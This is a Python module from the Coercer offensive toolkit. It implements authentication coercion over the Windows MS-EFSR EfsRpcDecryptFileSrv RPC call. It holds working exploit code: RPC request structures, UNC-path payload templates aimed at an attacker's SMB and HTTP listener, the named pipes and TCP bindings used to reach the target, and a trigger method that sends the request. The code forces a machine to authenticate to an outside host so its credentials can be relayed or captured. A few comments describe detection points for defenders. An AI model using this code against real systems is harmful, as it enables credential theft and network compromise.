#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : EfsRpcDecryptFileSrv.py
# Author : Podalirius (@podalirius_)
# Date created : 16 Sep 2022
from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
class _EfsRpcDecryptFileSrv(NDRCALL):
    """
    NDR request structure for EfsRpcDecryptFileSrv() (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Wire layout, in order:
      - FileName (wchar_t *): the path the server is asked to act on; this is the
        single argument the coercion relies on.
      - OpenFlag (unsigned long): open flag for the call; the trigger() in this
        file always sends 0.
    """
    opnum = 5
    structure = (
        ('FileName', WSTR),
        ('OpenFlag', ULONG),
    )
class _EfsRpcDecryptFileSrvResponse(NDRCALL):
    """
    NDR response structure for EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Nothing from the reply body is needed by this module, only whether the call
    completed, so the structure is left empty. The class name must stay paired
    with the request class: impacket resolves the response type by appending
    "Response" to the request class name inside the same module.
    """
    structure = ()
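class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)

    ``exploit_paths`` lists the FileName templates that are tried (UNC paths
    pointing at ``{{listener}}``); ``access`` lists the named pipes and the TCP
    binding the interface is reachable on, so it also tells a defender where this
    call shows up on the wire: the EFSRPC-specific pipe carries interface
    df1941c5-..., while the lsarpc/samr/lsass/netlogon pipes expose interface
    c681d488-... .
    """

    # Each template is rendered by the framework (listener, port, random token).
    # The trailing \x00 terminates the WSTR on the wire.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings on which EfsRpcDecryptFileSrv can be reached.
    # NOTE: the "ncan_np" key is the spelling the rest of the framework looks up;
    # renaming it would break lookup elsewhere.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Descriptor used by the framework; FileName is the only argument taken from exploit_paths.
    function = {
        "name": "EfsRpcDecryptFileSrv",
        "opnum": 5,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcDecryptFileSrv request with ``FileName`` set to ``self.path``.

        Args:
            dcerpc_session: a bound DCE/RPC session, or None when connect() has not
                been called yet.
            target: not used by this method; presumably kept for signature
                compatibility with the other MSPROTOCOLRPCCALL subclasses.

        Returns:
            "" when the request was sent and answered without an exception, the
            caught exception object when the call raised, and None (after printing
            an error) when no session was given.
        """
        # Guard clause: without a session there is nothing to send.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcDecryptFileSrv()
            request['FileName'] = self.path
            request['OpenFlag'] = 0
            # The reply body is not inspected: only whether the server processed
            # the FileName argument matters, and the framework reports on that.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors (e.g. a DCERPCSessionError from the session) are returned rather
            # than raised so the caller can record the outcome of each path tried.
            return err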